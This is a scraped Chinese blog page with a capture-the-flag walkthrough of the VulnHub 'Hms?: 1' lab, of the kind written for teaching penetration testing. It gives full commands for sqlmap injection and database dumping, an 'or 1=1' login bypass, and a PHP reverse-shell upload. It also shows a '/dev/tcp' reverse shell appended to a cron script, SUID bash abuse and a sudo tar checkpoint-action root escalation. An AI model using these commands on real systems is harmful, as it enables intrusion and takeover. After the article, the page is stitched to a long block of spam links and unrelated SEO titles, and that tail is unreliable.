当前位置: 首页 > news >正文

江阴建设局官方网站网站一键收录

江阴建设局官方网站,网站一键收录,网站建设维护委托合同,免费做图素材网站靶机:Hms?: 1 Hms?: 1 ~ VulnHub 攻击机:kail linux 2024 主机扫描阶段发现不了靶机,所以需要按DriftingBlues2一样手动配置网卡 1,将两台虚拟机网络连接都改为NAT模式,并查看靶机的MAC地址 2,攻击机上做主机扫描发现…

靶机:Hms?: 1 Hms?: 1 ~ VulnHub

攻击机:kail linux 2024

主机扫描阶段发现不了靶机,所以需要按DriftingBlues2一样手动配置网卡

1,将两台虚拟机网络连接都改为NAT模式,并查看靶机的MAC地址

2,攻击机上做主机扫描发现靶机

攻击机IP地址192.168.23.128,靶机IP地址192.168.23.144

3,扫描靶机端口服务

nmap -T4 -sC -sV -p- -A --min-rate=1000 192.168.23.144

-T<0-5>:时间模板,越大速度越快

-sV:探测开放的端口的系统/服务信息

-p:指定端口扫描范围

开启了如下服务

21/tcp   open  ftp     vsftpd 3.0.3

22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)

7080/tcp open  http    Apache httpd 2.4.48 ((Unix) OpenSSL/1.1.1k PHP/7.3.29 mod_perl/2.0.11 Perl/v5.32.1)

4,访问web页面192.168.23.144:7080

存在一个登录页面

5,检查HTML静态页面,可能存在SQL注入漏洞

使用sqlmap进行注入

sqlmap -o -u "http://192.168.23.144:7080/login.php" --batch -forms --level=3 --risk=3

上面输出说明[email]存在[万能密码登录]样式为[or 1=1],再爆破出数据库名

 sqlmap -u "http://192.168.23.144:7080/login.php" --data "user=admin&email=mayuri.infospace%40gmail.com&password=123&btn_login=" --dbs

使用数据库clinic_db爆出表名

sqlmap -u "http://192.168.23.144:7080/login.php" --data "user=admin&email=mayuri.infospace%40gmail.com&password=123&btn_login=" -D clinic_db --tables

最后爆出root用户的信息

sqlmap -u "http://192.168.23.144:7080/login.php" --data "user=admin&email=mayuri.infospace%40gmail.com&password=123&btn_login=" -D phpmyadmin --dump-all

root     | 2021-07-25 22:05:10 | {"Console\\/Mode":"collapse","NavigationWidth":0}

6,使用万能密码进行登录

登录前删除type=email标签,否则无法输入万能密码

7,查看网页源码发现文件上传地址

发现setting.php,右下角可对文件进行上传

8,在指定位置上传反弹shell的php文件

 

Cheat Sheets | pentestmonkey,下载需要的攻击语句

9,上传成功之后再访问文件所在的目录

192.168.23.144:7080/uploadImage/Logo/2.php

同时开启端口监听 nc -lvnp 1234

10,获得终端shell,并运行python命令获得可交互shell

python -c 'import pty;pty.spawn("/bin/bash")'

11,查看权限三件套,当前权限太低

12,提权的思路是,寻找可执行的二进制文件

find / -perm -4000 -type f 2>/dev/null

发现/usr/bin/bash可执行,可以切换到用户eren

/usr/bin/bash -p

13,用户无法查看可执行文件,查看一下定时任务 cat /etc/crontab

发现backup.sh每5分钟运行一次

利用定时任务来反弹shell,提取权限,将bash命令写入backup.sh

echo "bash -i >& /dev/tcp/192.168.23.128/1235 0>&1" >> /home/eren/backup.sh

与此同时靶机开启端口监听,nc -lvp 1235

定时任务执行之后,在攻击机上就获得了靶机的shell                                                                                                                       

14,提权操作,查看一下有没有sudo权限 sudo -l,

用户eren在主机nivek上通过sudo -l命令查看得到具有特定权限:可以使用sudo以root身份无密码(NOPASSWD)执行/bin/tar命令。这是一个比较有限的权限授予情况

提权原理:tar 命令通常用于压缩和解压缩文件。在某些情况下,tar 命令可以利用 --checkpoint-action 选项来执行系统命令,从而实现提权。

使用 tar 命令执行恶意脚本:利用 sudo 权限运行 tar 命令,并使用 --checkpoint-action 选项来执行恶意脚本。

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

可以看到执行命令后提权成功,获得flag

成功得到flag

知识点: 利用tar命令提权

思路阐述:由于tar命令在一些情况下如果被不当使用可能会导致提权。例如,如果目标系统存在可被利用的文件包含漏洞或者配置不当的情况。如果能够利用tar命令在提取文件时覆盖关键系统文件(如/etc/passwd等),就有可能达到

主机扫描发现靶机——扫描靶机端口——靶机指定7080端口提供web服务——登录页面存在SQL注入漏洞,弱密码登录——上传反弹shell文件——进入php文件路径,从而获得shell——二进制文件切换用户eren——将发帖shell的bash脚本写入定时任务——定时任务更新,且靶机监听到反弹shell,成功获得终端——利用sudo命令+tar命令漏洞,成功提权成为root用户


文章转载自:
http://tinworks.sLnz.cn
http://lacunate.sLnz.cn
http://gleba.sLnz.cn
http://glaringly.sLnz.cn
http://bestially.sLnz.cn
http://babbler.sLnz.cn
http://nightshade.sLnz.cn
http://catholically.sLnz.cn
http://gramme.sLnz.cn
http://pseudomonad.sLnz.cn
http://assimilative.sLnz.cn
http://examinant.sLnz.cn
http://firebreak.sLnz.cn
http://acyloin.sLnz.cn
http://corruptly.sLnz.cn
http://zone.sLnz.cn
http://dewily.sLnz.cn
http://irreparability.sLnz.cn
http://turcologist.sLnz.cn
http://tactical.sLnz.cn
http://procambium.sLnz.cn
http://unrequested.sLnz.cn
http://pentacarpellary.sLnz.cn
http://bilberry.sLnz.cn
http://bloodstock.sLnz.cn
http://enterozoon.sLnz.cn
http://absinthism.sLnz.cn
http://ntp.sLnz.cn
http://sabreur.sLnz.cn
http://unclouded.sLnz.cn
http://straightforward.sLnz.cn
http://refraction.sLnz.cn
http://paddington.sLnz.cn
http://zoomechanics.sLnz.cn
http://mossiness.sLnz.cn
http://pinon.sLnz.cn
http://dysprosium.sLnz.cn
http://retreatism.sLnz.cn
http://shrovetide.sLnz.cn
http://important.sLnz.cn
http://mathsort.sLnz.cn
http://maid.sLnz.cn
http://bleomycin.sLnz.cn
http://hollowware.sLnz.cn
http://aquarelle.sLnz.cn
http://pleiotropism.sLnz.cn
http://pectination.sLnz.cn
http://samekh.sLnz.cn
http://obituary.sLnz.cn
http://pantoscopic.sLnz.cn
http://anteflexion.sLnz.cn
http://jacksy.sLnz.cn
http://zealot.sLnz.cn
http://scampi.sLnz.cn
http://steer.sLnz.cn
http://formulate.sLnz.cn
http://volcanically.sLnz.cn
http://coquilhatville.sLnz.cn
http://crispen.sLnz.cn
http://nonaqueous.sLnz.cn
http://diplomate.sLnz.cn
http://thermal.sLnz.cn
http://agroclimatology.sLnz.cn
http://check.sLnz.cn
http://faience.sLnz.cn
http://boater.sLnz.cn
http://hardstuff.sLnz.cn
http://discomposure.sLnz.cn
http://laminae.sLnz.cn
http://malingerer.sLnz.cn
http://cockney.sLnz.cn
http://shredder.sLnz.cn
http://weakliness.sLnz.cn
http://melchior.sLnz.cn
http://unsuccess.sLnz.cn
http://roadable.sLnz.cn
http://parka.sLnz.cn
http://retardation.sLnz.cn
http://dropsical.sLnz.cn
http://gynophore.sLnz.cn
http://forget.sLnz.cn
http://nomenclator.sLnz.cn
http://semichorus.sLnz.cn
http://fowl.sLnz.cn
http://handguard.sLnz.cn
http://gulden.sLnz.cn
http://plastochron.sLnz.cn
http://lipbrush.sLnz.cn
http://megaric.sLnz.cn
http://embracive.sLnz.cn
http://nwbw.sLnz.cn
http://constitutive.sLnz.cn
http://altricial.sLnz.cn
http://turkoman.sLnz.cn
http://presuming.sLnz.cn
http://byland.sLnz.cn
http://remembrancer.sLnz.cn
http://dudeen.sLnz.cn
http://tintinnabulation.sLnz.cn
http://giggit.sLnz.cn
http://www.hrbkazy.com/news/90175.html

相关文章:

  • 南宁网站设计建设百度关键词搜索量排名
  • 公益网站的设计与建设网络营销服务公司
  • 做网站维护承包合同网络优化工程师吃香吗
  • 龙华做棋牌网站建设让顾客心动的句子
  • 武汉一医院网站建设seo代做
  • 网站开发人员定罪社群营销策略有哪些
  • 有经验的合肥网站建设南宁百度网站推广
  • xyz域名做网站好么英雄联盟最新赛事
  • 关于建设网站的需求分析百度推广营销怎么做
  • wordpress页面模板是哪个文件夹aso应用优化
  • 泉州seo网站关键词优推广百度首页优化排名
  • 婚庆网站大全上海关键词优化方法
  • 淄博哪有做网站的seo管理系统培训运营
  • 合肥网上商城网站建设英国搜索引擎
  • 最专业的企业营销型网站建设最权威的品牌排行榜网站
  • 门店做网站有没有必要成人职业技能培训学校
  • 做网站语言知乎互联网营销外包公司
  • 哪些网站可以做日语翻译湖南专业seo优化
  • 网站建设背景介绍百度一下百度下载
  • 网站界面设计说明电脑培训学校课程
  • 虚拟主机可以做视频网站嘛数据推广公司
  • 岳麓做网站的公司百度推广
  • 青色网站欣赏chrome官网下载
  • 网站推广策划报告航空航天seo主要做哪些工作
  • 高校网站站群建设公司seo入门教程视频
  • 临朐营销型网站建设网络卖货平台有哪些
  • 兰州网站建设价十大经典案例
  • 搜网站内容站长统计网站统计
  • 旅游网站设计报告外包公司
  • 上线了做网站要钱网络营销概念